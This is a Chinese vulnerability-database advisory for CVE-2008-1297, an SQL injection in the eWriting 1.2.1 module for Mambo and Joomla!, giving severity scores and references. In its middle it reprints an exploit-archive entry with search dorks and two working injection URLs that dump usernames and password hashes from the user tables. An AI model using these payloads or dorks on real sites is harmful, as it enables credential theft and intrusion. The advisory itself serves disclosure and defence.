CVE-2008-1297 |
|
发布时间 :2008-03-12 13:44:00 | ||
修订时间 :2008-09-05 17:37:22 | ||||
NMCOE |
[原文]SQL injection vulnerability in index.php in the eWriting (com_ewriting) 1.2.1 module for Mambo and Joomla! allows remote attackers to execute arbitrary SQL commands via the cat parameter in a selectcat action.
[CNNVD]Mambo Com_ewriting ‘index.php’ SQL注入漏洞(CNNVD-200803-189)
Mambo 和Joomla! eWriting (com_ewriting)模块的index.php存在SQL注入漏洞。远程攻击者通过一个selectcat操作中的cat参数来执行任意SQL命令。
–
CVSS (基础分值)
CVSS分值: | 7.5 | [严重(HIGH)] |
机密性影响: | PARTIAL | [很可能造成信息泄露] |
完整性影响: | PARTIAL | [可能会导致系统文件被修改] |
可用性影响: | PARTIAL | [可能会导致性能下降或中断资源访问] |
攻击复杂度: | LOW | [漏洞利用没有访问限制 ] |
攻击向量: | NETWORK | [攻击者不需要获取内网访问权或本地访问权] |
身份认证: | NONE | [漏洞利用无需身份认证] |
–
CWE (弱点类目)
CWE-89 | [SQL命令中使用的特殊元素转义处理不恰当(SQL注入)] |
–
CPE (受影响的平台与产品)
cpe:/a:mambo:com_ewriting:1.2.1 | |
cpe:/a:joomla:com_ewriting:1.2.1 | |
cpe:/a:ewriting:ewriting:1.2.1 |
–
OVAL (用于检测的技术细节)
未找到相关OVAL定义 |
–
官方数据库链接
–
其它链接及资源
http://www.securityfocus.com/bid/28179 (UNKNOWN) BID 28179 |
http://www.milw0rm.com/exploits/5226 (UNKNOWN) MILW0RM 5226 |
http://secunia.com/advisories/29292 (VENDOR_ADVISORY) SECUNIA 29292 |
–
漏洞信息
Mambo Com_ewriting ‘index.php’ SQL注入漏洞 | |
高危 | SQL注入 |
2008-03-12 00:00:00 | 2008-09-05 00:00:00 |
本地 | |
Mambo 和Joomla! eWriting (com_ewriting)模块的index.php存在SQL注入漏洞。远程攻击者通过一个selectcat操作中的cat参数来执行任意SQL命令。 |
–
公告与补丁
目前厂商还没有提供补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://www.joomla.org/ |
–
漏洞信息 (5226)
Mambo Component eWriting 1.2.1 (cat) SQL Injection Vulnerability (EDBID:5226) |
|
php | webapps |
2008-03-10 | Verified |
0 | Don |
N/A |
[点击下载] |
eWriting 1.2.1 - SQL injection # Discovered by breaker_unit & Don # BHack # b4lc4n.org # Gretz to h4cky0u.org l r00tsecurity.org l h4cky0u.biz l Dorks: "Powered by eWriting 1.2.1 allinurl:"com_ewriting" Joomla! /index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+jos_users-- Mambo /index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+mos_users-- ++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # milw0rm.com [2008-03-10]
–
漏洞信息
42727 |
|
eWriting Component for Mambo / Joomla! index.php cat Parameter SQL Injection | |
Remote / Network Access |
Information Disclosure, Input Manipulation |
Loss of Confidentiality, Loss of Integrity |
|
Exploit Public | Uncoordinated Disclosure |
–
漏洞描述
eWriting Component for Mambo / Joomla! contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the 'index.php' not properly sanitizing user-supplied input to the 'cat' variable. This may allow an attacker to inject or manipulate SQL queries in the back-end database. |
–
时间线
2008-03-10 |
Unknow |
2008-03-10 | Unknow |
–
解决方案
Currently, there are no known upgrades, patches, or workarounds available to correct this issue. |